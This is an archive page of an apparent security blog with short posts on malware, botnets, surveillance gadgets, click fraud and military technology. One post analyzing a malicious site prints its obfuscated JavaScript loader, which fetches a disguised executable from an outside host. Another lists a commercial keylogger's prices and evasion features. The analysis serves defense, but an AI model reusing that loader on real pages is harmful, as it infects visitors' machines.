Ballistic Missile Defense Engagement Points

Outstanding animation covering pretty much all of the current engagement points in case a missile is fired from anywhere across the world, total syncronization between air, land and naval force, and I must say the background music is excellent too.



In a previous post, Who Needs Nuclear Weapons Anymore? I provided my reflection on the overal shift of threats nowadays compared to the ones back in the Cold War days you may informative, as well as an essay I wrote back in 1998. Cryptome's Eyeballing of Missile Defense is also worth going through. Continue reading →

Vladuz's Ebay CAPTCHA Populator

Nice slideshow courtesy of eWeek providing various screenshots related to Vladuz's impersonation attacks on Ebay :

"And whether or not Vladuz is responsible for writing a tool to automatically skim eBay customers accounts and thus cause sharp spikes in bogus listings being taken down and relisted multiple times a day, he or she has the mythic reputation at this point to be credited as the cause."

Compared to diversifying its targets, permanently sticking to Ebay as the main target is already prompting the Web icon to put more efforts into tracking him down. Last year for instance, automated bots exploited Ebay's CAPTCHA and started self-recommending each other, but with Vladuz's Ebay CAPTCHA Populator, improving the quality of Ebay's authentication process should get a higher priority than tracking him down as another such tool will follow from someone else out there. Continue reading →

Photoshoping Your Reality

It's not just a stereotyped beauty model, advanced image editing tools and techniques can make you believe in, but they can also influence your understand of reality too as you can see in Wired's famous altered photos collection :

"A picture is worth a thousand words, and Photoshop and similar tools have made it easier than ever to make those words fib. But while computers enable easier and better photo manipulation, it is hardly a new phenomenon. Here is a sampling of some of the more famous altered photographs from the last century."

Here's a free service letting you fake photos. Here's another one as well as a variant of mine in relation to a previous post. Continue reading →

Shots from the Malicious Wild West - Sample Three

Keyloggers on demand, the so called zero day keyloggers ones created especially to be used in targeted attacks are something rather common these days. Among the many popular ones that remained in service and has been updated for over an year is The Rat! Keylogger. Here are some prices in virtual WMZ money concerning all of its versions :

The Rat! 7.0XP - 29 WMZ
The Rat! 6.0XP/6.1 - 22 WMZ
The Rat! 5.8XP - 15 WMZ
The Rat! 5.5XP - 13 WMZ
The Rat! 5.0XP - 9 WMZ
The Rat! 4.0XP - 8 WMZ
The Rat! 3.xx - 7 WMZ
The Rat! 2.xx - 6 WMZ

An automated translation of its features :

For the installation to the machines with the operating systems Windows xp, Windows 2000 and on their basis. Finale - apotheosis! Let us recall again, for which we love our rodent:
- the size of file- result is record small - 13 312 bytes in the nezapakovannom form (with the packing with use FSG, 6 793 bytes!).
- not it detektitsya as virus by antiviryami.
- it follows the buffer of exchange.
- the system of invisibility and circuit of fayervola.
- the fixation of pressure you klavish' in the password windows and the console.
- the sending of lairs on e-mail, with the support to autentifikatsii RFC - 2554.
- the encoding of dump.
- tuning the time of activation and time of stoppage
- removal in the time indicated without it is trace and reloading.

Digital fingerprints will follow as soon as I finish bruteforcing the password protected archives. Continue reading →

Shots from the Malicious Wild West - Sample Two

Packers are logically capable of rebooting the lifecycle of a binary and making it truly unrecognizable. The Pohernah Crypter is among the many recently released packers you might be interested in taking a peek at. By the time a packer's pattern becomes recognizable, a new one is introduced, and in special cases there are even packers taking advantage of flaws in an AV software itself.

Compared to the common wisdom of malware authors being self-efficient and coming up with packers by themselves, we've already seen cases where investments in purchasing commercial anti-debugging software is considered. You may find these test results of various anti virus software against packed malware informative, which as a matter of fact truly back up my experience with the winning engines and their performance in respect to packed malware.

File size: 6901 bytes
MD5: 6ce1283af00f650e125321c80bf42097
SHA1: 08ac9a9e2181d8a94e6d96311c21c8db1766e2f1 Continue reading →

Shots from the Malicious Wild West - Sample One

Come to daddy. At _http://www.ms-counter.com we have an URL spreading malware through redirectors and the natural javascript obfuscation :

Input URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Effective URL: _http://www.ms-counter.com/ms-counter/ms-counter.php?t=45
Responding IP: 81.95.148.10
Name Lookup Time: 0.300643
Total Retrieval Time: 0.887313
Download Speed: 9878

Then we get the following :




var keyStr = "ABCDEFGHIJKLMNO"+"PQRSTUVWXYZabcdefghijk"+"lmnopqrstuvwx"
+"yz0123456789+/="; function decode64(input) { var output = ""; var chr2, chr3,
chr1; var enc4, enc2, enc1, enc3; var i = 0; input = input.replace(/[^A-Za-z0-9\
+\/\=]/g, ""); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.index
Of(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.
indexOf(input.charAt(i++)); chr1 = (enc1 <<>> 4); chr2 = ((enc2 & 15)
<<>> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.from
CharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while
(i < input.length); return output; } document.write(decode64("IDxhcHBsZXQgYXJjaGl2ZT0ibXMtY291bnRlci5q
YXIiIGNvZGU9IkJhYWFhQmFhLmNsYXNzIiB3aWR0aD0xIGhlaWdodD
0xPjxwYXJhbSBuYW1lPSJ1cmwiIHZhbHVlPSJodHRwOi8vbXMtY291b
nRlci5jb20vbXMtY291bnRlci9sb2FkLnBocCI+PC9hcHBsZXQ+PHNjcml
wdCBsYW5ndWFnZT0nam ETC. ETC. ETC.

Deobfuscating the javascript we get to see where the binary is :

Input URL: _http://ms-counter.com/mscounter/load.php
Effective URL: _http://ms-counter.com/mscounter/load.php
Responding IP: 81.95.148.10
Name Lookup Time: 0.211247
Total Retrieval Time: 1.065943
Download Speed: 12898

Server Response :
HTTP/1.1 200 OK
Date: Sat, 10 Mar 2007 00:49:27 GMT
Server: Apache
X-Powered-By: PHP/4.4.4
Content-Disposition: attachment; filename="codecs.exe"
Connection: close
Transfer-Encoding: chunked
Content-Type: application/exe

File info :
File size: 13749 bytes
MD5: f0778c52e26afde81dffcd5c67f1c275
SHA1: d61c6c17b78db28788f9a89c12b182a2b1744484

Running it over VT we get the following results you can see in the screenshot. It's obvious major AV software doesn't detect this one, but what you should keep in mind is the currently flawed signatures based malware detection approach. That's of course given someone's considering updating their AV software. In another analysis I'll come with another binary that all major AV vendors detect, but the second tier ones doesn't. Host based IPS based protection and behaviour blocking, and the actual prevention of loading the script is the way to avoid the exploitation of the flaws in signatures based scanning protection. Continue reading →

Envy These Women Please

Differentiating from the usual Most Powerful Women list, Forbes did a little niching to come up with a slideshow of women billionaires they envy most :

"Imagine for a moment what it would be like to be a billionaire. No more picking up after the kids, doing dishes, worrying about how much a dress costs or pinching pennies to save for an amazing vacation. For the women on Forbes' new list of the world's billionaires, that dream is a reality. But it's not just their 10-figure fortunes that make us envious. Some of these women are famous; some wield enormous power; some have fascinating careers. Some have all three."

Is it just me, or inherited wealth is boring right from the very beginning? The emergence of the spoon people, or so they say -- "Spoon feeding in the long run teaches us nothing but the shape of the spoon" Edward Morgan Forster. A week ago I participated in a discussion about power, most importantly one trying to define power and we ended up with several states of power - positional power, the C-level executives, expertise power, or the revenge of the underestimated walking case studies, and networking power. It's all a cyclical process like pretty much anything in life. Continue reading →

U.K's Latest Military Satellite System

The U.K military is about to upgrade their Skynet 4 satellite system to Skynet 5 :

"Four steerable antennas give it the ability to focus bandwidth on to particular locations where it is most needed - where British forces are engaged in operations. Its technologies have also been designed to resist any interference - attempts to disable or take control of the spacecraft - and any efforts to eavesdrop on sensitive communications. An advanced receive antenna allows the spacecraft to selectively listen to signals and filter out attempts to "jam" it."

Among the many features the new system introduces, two are worth mentioning - it's targeted bandwidth capability where it's needed and the sort of DENY:ALL upgraded receive antenna to avoid jamming. Now pray China won't take it down, or let the debris (conveniently) take care of the rest -- so vulnerable it makes you want to establish a space warfare code of conduct. Continue reading →

Armed Land Robots

After seeking to dominate the air, it's time defense contractors turn back to innovating on the ground, especially when we speak of armed and remotely controlled robots. Crucial for both, reconnaissance and guerilla warfare situations, movement flexibity as well as payload capacity is what adds more value to these robots. An Israeli based defense contractor Elbit Systems recently introduced The Viper :

"The Viper, which is about a foot long and weigh approximately five pounds, is powered by a special electrical engine and operated by remote control or according to a program implanted in its 'brain' in advance. It is capable of climbing stairs, getting past obstacles and at the same time checks what is going on around it by means of a system of sensors. Equipped with a special nine-millimeter caliber Uzi machine gun, on which a laser pointer has been installed. The Viper is carried to the battlefield by a soldier on his back in a special carrier. When it is necessary to infiltrate a building safely where, for example, armed terrorists are hiding, the soldier lowers it to the ground, turns it on and from that moment controls it from a distance."

I'm very interested in the possibility for a 360 degree view, it's noise generation level, the variety of terrains its supports, and most importantly - would it put itself back on its "feet" if it inevitably turns upside down. See, you wouldn't want your pricey attack toy acting like a cheap remotely controlled car toy, would you? Engadget has a photo of Viper.

Here's a recommended article on the history of armed aerial UAVs, as well as a recent story on beam energy weapons, the vomit beam in this case. Continue reading →

UK Telecoms Lack of Web Site Privacy

When the U.S and Canada are the benchmark it's logical to conclude the U.K gets poor ratings as web site privacy especially in the commercial sector is something the U.S and Canada tackled a long time ago. Taking the pragmatic perspective, does it really matter in times when government officials abuse commercially aggregated data, one they cannot legally obtain by themesleves, and so they ought to perform as paper-tigers to access it? Here's an interesting analysis :

"The U.K. industry, however, performed much worse in privacy. Telecom firms, especially in the U.K., ask for more personal data than companies in other industries. This data is often unconnected to the request being made by the customer.

U.K. sites are generally unclear about data sharing practices, with 23 per cent judged to be explicit compared to 69 per cent in the U.S. Clarity in this area has made steady gains in the U.S. in the past 12 months, but the U.K. has shown no significant change.

It is not only clarity that fails in the U.K., but also the actual practices in place. Eleven of the 13 sites routinely share personal data with other internal groups, business partners or third parties without explicit permission. This compared poorly with the U.S., where 40 per cent share in the same way. The best performing site with regards to privacy in the U.K. was O2."

Moreover, the U.K realizing its ongoing negative PR across the globe in respect to the CCTV surveillance myopia, they've released a report claiming Italy's COMINT is worse than their (walking) CCTV surveillance efforts. To publish a privacy policy or not to publish a privacy policy? That "used to be" the question. Continue reading →

Steganography Applications Hash Set

Did you know that there are over 600 applications capable of using steganography to hide data? Me neither, but here's a company that's innovating in the field of detecting such ongoing communication :

"Backbone Security’s Steganography Analysis and Research Center (SARC) is pleased to announce the release of version 3.0 of SAFDB. With the fingerprints, or hash values, of every file artifact associated with 625 steganography applications, SAFDB is the world’s largest commercially available hash set exclusive to digital steganography and other information hiding applications. The database is used by Federal, state and local law enforcement; intelligence community; and private sector computer forensic examiners to detect the presence or use of steganography and extract hidden information.

Version 3.0 contains hash values for each file artifact associated with the 625 steganography applications computed with the CRC-32, MD5, SHA-1, SHA-224, SHA-256, SHA-384, and SHA-512 algorithms.

A free extract of SAFDB with MD5 hashes only is available to qualifying law enforcement, government, and intelligence agency computer forensic examiners."

Chart courtesy of Huaiqing Wang and Shuozhong Wang. And here's a related post. Continue reading →

Distributed Computing with Malware

Distributed computing with malware infected PCs is nothing new as a concept, it's just the lack of botnet master's desire to contribute processing power for anything socially oriented. That's until late last month, when members of Berkeley's BOINC project noticed a project that was suspiciously becoming popular and found out that malware infected PCs had the BOINC client installed to participate in it :

"It recently came to the attention of boinc staff that a multi-project cruncher called Wate who occupied a very high position in the boinc and project stats had reached this exalted position by dishonest means. In early June 2006 he appears to to have released onto the internet a link purporting to provide Windows updates including now for Vista. Some 1500 members of the public worldwide downloaded these 'updates' which in fact consisted of a trojan application that downloaded boinc.exe and attached the person's computer to Wate's account, giving him the subsequent fraudulent credits. About 90% of the people affected appear to have uninstalled or disabled the unwanted boinc installation, but some compromised computers are still running and crashing climate models. Boinc and project staff have no means of contacting the owners of these computers."

If only would botnet masters take this note seriously, I'm sure we'll see certain networks controlling the top 10 positions at the BOINC project. A war on bandwidth or CPU power? Continue reading →

Documentary on ECHELON - The Spy System

Remember ECHELON? The über-secretive worldwide intelligence sharing network that various activists once tried to poison by generating fake suspicious traffic using predefined keywords? Well, the system is still operating, and with the lack of transparency in the participating country's use and abuse of the technology, all we need is an EU alternative competing with the original.

Watch this excellent half an hour long documentary and find out : "What exactly is Echelon? How can it invade privacy, yet protect liberty? How did this billion-dollar system miss the September 11th attacks? In a riveting hour, we uncover the mysterious, covert world of NSA's electronic espionage."

Continue reading →

USB Surveillance Sticks

Despite the ongoing awareness built among enterprises and end users on the risks posed by removable media, there are vendors offering various surveillance solutions over an USB stick. Some are handy, others contradictive. And while RFID tags are getting smaller than a crop of rice, here are three surveillance solutions to keep in mind right next to the notorious KeyGhost hardware keylogger.

SnoopStick
An example of malware on demand at $59.95 which comes with lots of features as well as automatic updates :

"The SnoopStick monitoring components are completely hidden, and there are no telltale signs that the computer is being monitored. You can then unplug the SnoopStick and take it with you anywhere you go. No bigger than your thumb and less than 1/4" thick, you can carry it in your pocket, purse, or on your keychain. Any time you want to see what web sites your kids or employees are visiting, who they are chatting with, and what they are chatting about, simply plug in your SnoopStick to any Windows based computer with an Internet connection and a USB port. SnoopStick will automatically connect to the target computer."

TrackStick
Portable GPS surveillance with historical routes that look simply amazing when applied at Google Earth :

"The Track Stick will work anywhere on the planet Earth. Using the latest in GPS mapping technologies, your exact location can be shown on graphical maps and 3D satellite images. The Track Stick's micro computer contains special mathematical algorithms, that can calculate how long you have been indoors. While visiting family, friends or even shopping, the Track Stick can accurately time and map each and every place you have been."

GadgetTrack
An interoperable surveillance solution supposed to assist you in case your iPod or even PSP get stolen, all you have to do is infect your device and prey there's Internet connectivity at a later stage. Tracking your stolen devices is one thing, getting them back is completely another :

"What if your device could phone home? Well now it can. With our patent-pending GadgetTrak™ system, you simply register your device and install our agent files on your device. If your device is missing or stolen, you log into your account and flag the device as lost or stolen. The next time the device is accessed it will attempt to contact us and provide data regarding the system it is plugged into." Continue reading →

Death is Just an Upgrade

Started as a project to digitally mimic 100% a human's behaviour, the Virtual Soldier research program is getting more funding to accomplish its mission, and go beyond :

"In particular, the contract calls for the VSR team to further develop their "Predictive Dynamics" tools for use in calculating human motion in a military environment. Invented by VSR researchers, the field of Predictive Dynamics already has made a significant impact on the field of human motion simulation by making it possible -- for the first time ever -- to calculate the walking and running involved in human gait when given such variables as human body size, strength, weight, load-carrying abilities and clothing effects."

Next, Santos will find himself exposed to radiation, blown up on pieces, getting hit by a truck, or pretty much anything that you would never get the chance to -- legally -- expose a living human to, for testing purposes. Continue reading →

Botnet Communication Platforms

Botnets, or the automated exploitation and management of malware infected PCs is perhaps the most popular and efficient cyber threat the Internet faces these days. Whether you define it as the war on bandwidth or who's commanding the largest infected population, this simple distributed hosts management problem is continuing to evolve in order for the botnet masters to remain undetected for as long as possible. On the other hand, the growing Internet population combined with the lack of awareness of the "just got a PC for Christmas" users, and IPv4's well known susceptability to IP spoofing compared to IPv6, always make the concept an interesting one to follow.

Despite that at the beginning of 2006, I pointed out on how malware related documentation and howtos turned into open source code resulting in a flood of malware variants, thus lowering the entry barries for a novice malware copycats, a week ago I located a very throughout document on various botnet communication platforms and I'm sure its author wouldn't mind me reposting the fancy graphs and commenting on them.

IRC based Botnet Communications
Nothing ground breaking in this one besides the various advices on stripping the IRCd, creating own network of IRC servers compared to using public ones, and on the importance of distributed secrecy of the botnet participants' IPs, namely each bot would never know the exact number or location of all servers and bots.

HTTP Botnet Communications
The possiblities with PHP and MySQL in respect to flexibility of the statistics, layered encryption and tunneling, and most importantly, decentralizing the command even improving authentication with port knocking are countless. Besides, with all the buzz of botnets continuing to use IRC, it's a rather logical move for botnet masters to shift to other platforms, where communicating in between HTTP's noise improves their chance of remaining undetected. Rather ironic, the author warns of possible SQL injection vulnerabilities in the botnet's command panel.

ICQ Botnet Communications
Perhaps among the main reasons to repost these graphs was the ICQ communication platform which I'll leave up to you to figure out. As a major weakness is listed the reliance on icq.com, but as we've already seen cases of botnets obtaining their commands by visiting an IRC channel and processing its topic, in this case it's ICQ WhiteLists getting the attention.

Related comments on the programming "know-how" discussed will follow. Know your Enemy!
Continue reading →

Real Time Censored URL Check in China

While the original initiative for a real-time URL censorship check in China was originally realized as a project by Jonathan Zittrain and Benjamin Edelman couple of years ago, it's great to see someone continued what they've started and came up with the GreatFirewallofChina.org :

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that despite of the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. Realizing that URLs themselves can be obfuscated, proxies and many other alternatives such as TOR for instance used, dynamic page content scanning for subversive keywords and the same technique used for sms messages is what I have in mind. For instance, according to the GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan independence related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective, than figuring out whether an URL is blocked or not only. Here are two great screenshots confirming the twisted reality, and a recent summary of situation in China.

It would be great to see how this project evolves and starts taking presenting the results by confirming whether or not an URL is blocked in all of the countries on the world's censorship map, or ever better, start feeding local search engines with possibly censored keywords, summarize the results and emphasize on the big picture. Continue reading →

AdSense Click Fraud Rates

Google's single most profitable revenue generation source AdSense has always been under fire for click fraud and most importanly the company's been under public scrutiny for better communicating their efforts on fighting the problem. Third party companies emerged and started filling the niche by coming up with click fraud analytics software so that Google's major customers, even the small to mid-size business could take advantage of an automated way to analyze click anomalies. But how prelevant is the problem really? Should the discussion always orbit around Google's efforts, to its customers' vigilance and education on detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google - click fraud is only 0.002% of all clicks. Danny Sullivan has an in-depth analysis of the topic, emphasizing on the importance of detected click fraud rates :

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year.Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

During July, 2006 Google commissioned a third-part analysis of their efforts to fight click fraud you will definitely find informative, and here's another research taking the discussion beyond the typical botnets and human clickers perspective. There are also false click fraud positives to keep in mind as shown in this analysis.

Stats courtesy of Clickfraudindex who by the way started blogging recently. Continue reading →

Social Engineering the Old Media

While the Rules of the Thirds are partly in place, the floating fragnance and his depressed look provide some clues. The story is very interesting though as it has happened before. As Tim Nudd comments on Adfreak :

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How it could have been prevented? Coordinating the campaign with local Gucci representatives, ensuring payment is processed before the ad is featured, or let's just say look at his face to figure out he's anything but a professional model. Continue reading →

Storm Worm Switching Propagation Vectors

The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading through blog and forum posts :

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high."We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that compared to situations where malware authors have to figure how to bypass the forum's CAPTCHA or mass spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant. Continue reading →